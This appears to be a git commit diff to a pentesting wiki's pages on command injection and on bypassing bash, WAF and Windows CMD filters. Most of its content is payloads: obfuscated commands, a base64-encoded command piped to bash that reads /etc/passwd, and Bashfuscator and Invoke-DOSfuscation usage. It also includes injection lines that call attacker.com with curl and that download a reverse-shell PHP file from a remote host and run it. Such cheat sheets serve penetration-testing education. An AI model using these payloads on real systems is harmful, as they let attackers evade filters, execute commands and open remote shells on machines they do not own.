GitBook: [#3532] No subject
This commit is contained in:
parent
7b172583b0
commit
58e5a59ae2
|
@ -55,15 +55,27 @@ ls *
|
|||
# [chars]
|
||||
/usr/bin/n[c] # /usr/bin/nc
|
||||
|
||||
# Quotes / Concatenation
|
||||
# Quotes
|
||||
'p'i'n'g # ping
|
||||
"w"h"o"a"m"i # whoami
|
||||
\u\n\a\m\e \-\a # uname -a
|
||||
ech''o test # echo test
|
||||
ech""o test # echo test
|
||||
bas''e64 # base64
|
||||
|
||||
#Backslashes
|
||||
\u\n\a\m\e \-\a # uname -a
|
||||
/\b\i\n/////s\h
|
||||
|
||||
# $@
|
||||
who$@ami #whoami
|
||||
|
||||
# Transformations (case, reverse, base64)
|
||||
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
|
||||
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
|
||||
$(rev<<<'imaohw') #whoami
|
||||
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
|
||||
|
||||
|
||||
# Execution through $0
|
||||
echo whoami|$0
|
||||
|
||||
|
@ -124,6 +136,12 @@ cat ${HOME:0:1}etc${HOME:0:1}passwd
|
|||
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
|
||||
```
|
||||
|
||||
### Bypass pipes
|
||||
|
||||
```bash
|
||||
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
|
||||
```
|
||||
|
||||
### Bypass with hex encoding
|
||||
|
||||
```bash
|
||||
|
@ -219,6 +237,13 @@ declare historywords
|
|||
1%0a`curl http://attacker.com`
|
||||
```
|
||||
|
||||
### Bashfuscator
|
||||
|
||||
```bash
|
||||
# From https://github.com/Bashfuscator/Bashfuscator
|
||||
./bashfuscator -c 'cat /etc/passwd'
|
||||
```
|
||||
|
||||
### RCE with 5 chars
|
||||
|
||||
```bash
|
||||
|
|
|
@ -42,22 +42,17 @@ ls %0A id # %0A Execute both (RECOMMENDED)
|
|||
`ls` # ``
|
||||
$(ls) # $()
|
||||
ls; id # ; Chain commands
|
||||
ls${LS_COLORS:10:1}${IFS}id # Might be useful
|
||||
|
||||
#Not execute but may be interesting
|
||||
> /var/www/html/out.txt #Try to redirect the output to a file
|
||||
< /etc/passwd #Try to send some input to the command
|
||||
```
|
||||
|
||||
### **Limition** Bypasses
|
||||
### Bypasses
|
||||
|
||||
If you are trying to execute **arbitrary commands inside a linux machine** you will be interesting in read about this **Bypasses:**
|
||||
If you are trying to execute **arbitrary commands inside a linux machine** you will be interesting in read about this [**WAF bypasses**](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md).
|
||||
|
||||
{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %}
|
||||
[bypass-bash-restrictions.md](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### **Examples**
|
||||
### **Examples:**
|
||||
|
||||
```
|
||||
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
|
||||
|
|
|
@ -447,8 +447,22 @@ net helpmsg 32 #32 is the code in that case
|
|||
### Bypass Char Blacklisting
|
||||
|
||||
```bash
|
||||
echo %HOMEPATH:~6,-11%
|
||||
\
|
||||
echo %HOMEPATH:~6,-11% #\
|
||||
who^ami #whoami
|
||||
```
|
||||
|
||||
### DOSfuscation
|
||||
|
||||
Generates an obfuscated CMD line
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
|
||||
cd Invoke-DOSfuscation
|
||||
Import-Module .\Invoke-DOSfuscation.psd1
|
||||
Invoke-DOSfuscation
|
||||
help
|
||||
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
|
||||
encoding
|
||||
```
|
||||
|
||||
### Listen address ACLs
|
||||
|
|
Loading…
Reference in New Issue